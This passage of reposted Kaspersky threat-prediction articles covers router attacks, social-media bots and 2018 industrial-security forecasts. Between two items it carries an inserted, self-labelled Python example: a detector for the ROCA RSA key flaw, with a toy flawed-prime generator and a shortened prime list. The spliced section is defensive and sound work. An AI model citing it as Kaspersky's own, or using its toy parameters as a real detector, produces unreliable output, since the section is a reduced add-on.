  8. More router and modem hacks. Another known area of vulnerability that has gone vastly ignored is that of routers and modems. Be they home or enterprise, these pieces of hardware are everywhere, they’re critically important to daily operations, and they tend to run proprietary pieces of software that go unpatched and unwatched. At the end of the day, these little computers are Internet-facing by design and thereby sit at a critical juncture for an attacker intent on gaining persistent and stealthy access to a network. Moreover, as some very cool recent research has shown, in some cases attackers might even be able to impersonate different Internet users, making it possible to throw off the trail of an attacker entirely to a different connecting address. At a time of increased interest in misdirection and false flags, this is no small feat. Greater scrutiny of these devices will inevitably yield some interesting findings.

  9. A medium for social chaos. Beyond the leaks and political drama of the past year’s newfound love for information warfare, social media itself has taken a politicized role beyond our wildest dreams. Whether it’s at the hand of political pundits or confusing comedic jabs at Facebook’s CEO by South Park’s writers, eyes have turned against the different social media giants demanding some level of fact-checking and identification of fake users and bots attempting to exert disproportionate levels of social influence. Sadly, it’s becoming obvious that these networks (which base their success on quantified metrics like ‘daily active users’) have little incentive to truly purge their user base of bots, even when these bots are serving an obvious agenda or can be tracked and traced by independent researchers. We expect that as the obvious abuse continues and large bot networks become accessible to wider swaths of politically unsavory characters, the greater backlash will be directed at the use of social media itself, with disgusted users eagerly looking for alternatives to the household giants that revel in the benefits of the abuse for profits and clicks.

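Item 6 above mentions the flaw in Infineon’s RSA prime generator without saying how a defender can tell whether a given key came from the affected library. What follows is an added example, not code from the article or from Kaspersky: it implements the public-key check published by the researchers who found the flaw (commonly called ‘ROCA’). The affected library produced primes of the form p = k·M + (65537^a mod M), where M is the product of many small primes, so the modulus N = p·q satisfies N ≡ 65537^(a+b) (mod M). The check therefore tests, for every small prime r dividing M, whether N mod r lies in the subgroup generated by 65537 mod r. The list of small primes and the toy key size below are assumptions chosen so the demo runs offline in seconds; production detectors use a much larger M and real 2048-bit keys, but the test is the same. The `toy_roca_modulus` function mimics the flawed generator only so that the detector has something to flag.

```python
"""Fingerprint check for RSA moduli produced by the flawed Infineon prime
generator (added example; toy parameters are assumptions, see lead-in)."""
from math import prod

# Small odd primes making up the toy M. The real fingerprint uses the first
# few hundred primes; this short list is an assumption for a fast demo.
SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53,
                59, 61, 67, 71, 73, 79, 83, 89, 97]
GENERATOR = 65537          # the public exponent the flawed generator built on
M = prod(SMALL_PRIMES)     # primorial-style modulus used by the toy generator


def subgroup_generated(base, r):
    """Return {base^k mod r : k >= 0}, the multiplicative subgroup of Z_r*
    generated by base (r prime, base not divisible by r)."""
    members = set()
    x = 1
    while x not in members:
        members.add(x)
        x = (x * base) % r
    return members


def has_roca_fingerprint(n, primes=SMALL_PRIMES):
    """True if N mod r lies in <65537 mod r> for every small prime r.

    A modulus from the flawed generator always passes; a modulus built from
    genuinely random primes fails at least one residue test with probability
    1 - false_positive_rate()."""
    return all((n % r) in subgroup_generated(GENERATOR % r, r) for r in primes)


def false_positive_rate(primes=SMALL_PRIMES):
    """Probability that a random modulus passes every residue test: the
    product over r of |<65537 mod r>| / (r - 1)."""
    rate = 1.0
    for r in primes:
        rate *= len(subgroup_generated(GENERATOR % r, r)) / (r - 1)
    return rate


def is_probable_prime(n, bases=(2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)):
    """Miller-Rabin primality test with fixed bases (enough for the toy sizes)."""
    if n < 2:
        return False
    for b in bases:
        if n == b:
            return True
        if n % b == 0:
            return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for b in bases:
        x = pow(b, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def flawed_prime(a, start_k=1):
    """Mimic the flawed generator: smallest prime p = k*M + 65537^a mod M
    with k >= start_k. Every such p is congruent to a power of 65537 modulo
    each small prime, which is exactly what the fingerprint detects."""
    residue = pow(GENERATOR, a, M)
    k = start_k
    while True:
        p = k * M + residue
        if is_probable_prime(p):
            return p
        k += 1


def toy_roca_modulus():
    """Constructed sample: a ~240-bit modulus from two flawed primes."""
    p = flawed_prime(a=17)
    q = flawed_prime(a=23, start_k=5)
    return p * q


# Constructed 'healthy' textbook modulus: 101 * 113. Since 65537 ≡ -1 (mod 11),
# the subgroup mod 11 is {1, 10}, and 11413 mod 11 = 6 fails that test.
HEALTHY_MODULUS = 101 * 113

if __name__ == "__main__":
    n = toy_roca_modulus()
    print("toy flawed modulus flagged:", has_roca_fingerprint(n))       # True
    print("healthy modulus flagged:   ", has_roca_fingerprint(HEALTHY_MODULUS))  # False
    print("false-positive rate for this prime set: %.2e" % false_positive_rate())
```

The detector never touches private material: it needs only the public modulus, which is why the flaw could be surveyed at scale across certificates, TPM endorsement keys and smart-card keys once it was published. To check a real key, pass its modulus (for example, the `n` attribute of a parsed RSA public key) to `has_roca_fingerprint` and use the full prime list from the original research; with the 24 primes above the false-positive rate is already below one percent, and it drops exponentially as more primes are added.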
  10. APT predictions – conclusion

    In 2017 we pronounced the death of Indicators of Compromise. In 2018, we expect to see advanced threat actors playing to their new strengths, honing their new tools and the terrifying angles described above.  Each year’s themes and trends shouldn’t be taken in isolation – they build on each other to enrich an ever-growing landscape of threats facing users of all types, be it individuals, enterprise, or government. The only consistent reprieve from this onslaught is the sharing and knowledgeable application of high-fidelity threat intelligence.

    While these predictions cover trends for advanced targeted threats, individual industry sectors will face their own distinct challenges. In 2018, we wanted to shine the spotlight on some of those as well – and have prepared predictions for the connected healthcare, automotive, financial services, and industrial security sectors, as well as cryptocurrencies. You can find them all here!

    Threat Predictions for Automotive in 2018
    Threat Predictions for Connected Health in 2018
    Threat Predictions for Financial Services and Fraud in 2018
    Threat Predictions for Industrial Security in 2018
    Threat Predictions for Cryptocurrencies in 2018

http://ift.tt/2yEMwA0 Source: https://securelist.com



Threat Predictions for Industrial Security in 2018

The landscape in 2017

2017 was one of the most intense years in terms of incidents affecting the information security of industrial systems. Security researchers discovered and reported hundreds of new vulnerabilities, warned of new threat vectors in ICS and technological processes, provided data on accidental infections of industrial systems and detected targeted attacks (for example, Shamoon 2.0/StoneDrill). And, for the first time since Stuxnet, they discovered a malicious toolset some call a ‘cyber-weapon’ targeting physical systems: CrashOverride/Industroyer.

However, the most significant threat to industrial systems in 2017 was encryption ransomware attacks. According to a Kaspersky Lab ICS CERT report, in the first half of the year experts discovered encryption ransomware belonging to 33 different families. Numerous attacks were blocked, in 63 countries across the world. The WannaCry and ExPetr destructive ransomware attacks appear to have changed forever the attitude of industrial enterprises to the problem of protecting essential production systems.

What can we expect in 2018?

  1. A rise in general and accidental malware infections. With few exceptions, cybercriminal groups have not yet discovered simple and reliable schemes for monetizing attacks on industrial information systems. Accidental infections and incidents in industrial networks caused by ‘normal’ (general) malicious code aimed at a more traditional cybercriminal target, such as corporate networks, will continue in 2018. At the same time, we are likely to see such situations result in more severe consequences for industrial environments. The problem of regularly updating software in industrial systems in line with the corporate network remains unresolved, despite repeated warnings from the security community.
  2. Increased risk of targeted ransomware attacks. The WannaCry and ExPetr attacks taught both security experts and cybercriminals that operational technology (OT) systems are more vulnerable to attack than IT systems, and are often exposed to access through the Internet. Moreover, the damage caused by malware can exceed that in the corresponding corporate network, and ‘firefighting’ in the case of OT is much more difficult. Industrial companies have demonstrated how inefficient their organization and staff can be when it comes to cyberattacks on their OT infrastructure. All of these factors make industrial systems a desirable target for ransomware attacks.
  3. More incidents of industrial cyberespionage. The growing threat of organized ransomware attacks against industrial companies could trigger development of another, related area of cybercrime: the theft of industrial information systems data to be used afterwards for the preparation and implementation of targeted (including ransomware) attacks.
  4. New underground market activity focused on attack services and hacking tools. In recent years, we have seen growing demand on the black market for zero-day exploits targeting ICS. This tells us that criminals are working on targeted attack campaigns. We expect to see this interest increase in 2018, stimulating the growth of the black markets and the appearance of new segments focused on ICS configuration data and ICS credentials stolen from industrial companies and, possibly, offerings of botnets with ‘industrial’ nodes. The design and implementation of advanced cyberattacks targeting physical objects and systems requires expert knowledge of ICS and the relevant industries. Demand is expected to drive growth in areas such as ‘malware-as-a-service’, ‘attack-vector-design-as-a-service’, ‘attack-campaign-as-a-service’ and more.
  5. New types of malware and malicious tools. We will probably see new malware being used to target industrial networks and assets, with features including stealth and the ability to remain inactive in the IT network to avoid detection, only activating in less secure OT infrastructure. Another possibility is the appearance of ransomware targeting lower-level ICS devices and physical assets (pumps, power switches, etc.).
  6. Criminals will take advantage of ICS threat analyses published by security vendors. Researchers have done a good job finding and making public various attack vectors on industrial assets and infrastructures and analyzing the malicious toolsets found. However, this could also provide criminals with new opportunities. For example, the CrashOverride/Industroyer toolset disclosure could inspire hacktivists to run denial-of-service attacks on power and energy utilities; criminals may use it for targeted ransomware attacks and may even invent schemes to monetize blackouts. The PLC (programmable logic controller) worm concept could inspire criminals to create real-world malicious worms, while others could try to implement malware using one of the standard languages for programming PLCs. Criminals could also recreate the concept of infecting the PLC itself. Both of these types of malware could remain undetected by existing security solutions.
  7. Changes in national regulation. In 2018, a number of different cybersecurity regulations for industrial systems will need to be implemented. For example, operators of critical infrastructure and industrial facilities will be compelled to do more security assessments. This will definitely increase protection and awareness. Thanks to that, we will probably see some new vulnerabilities found and threats disclosed.
  8. Growing availability of, and investment in, industrial cyber insurance. Industrial cyber-risk insurance is becoming an integral part of risk management for industrial enterprises. Previously, the risk of a cybersecurity incident was excluded from insurance contracts – just like the risk of a terrorist attack. But the situation is changing, with new initiatives introduced by both cybersecurity and insurance companies. In 2018, this will increase the number of audits/assessments and incident responses undertaken, raising cybersecurity awareness among the industrial facility’s leaders and operators.

http://ift.tt/2yEMw2Y Source: https://securelist.com



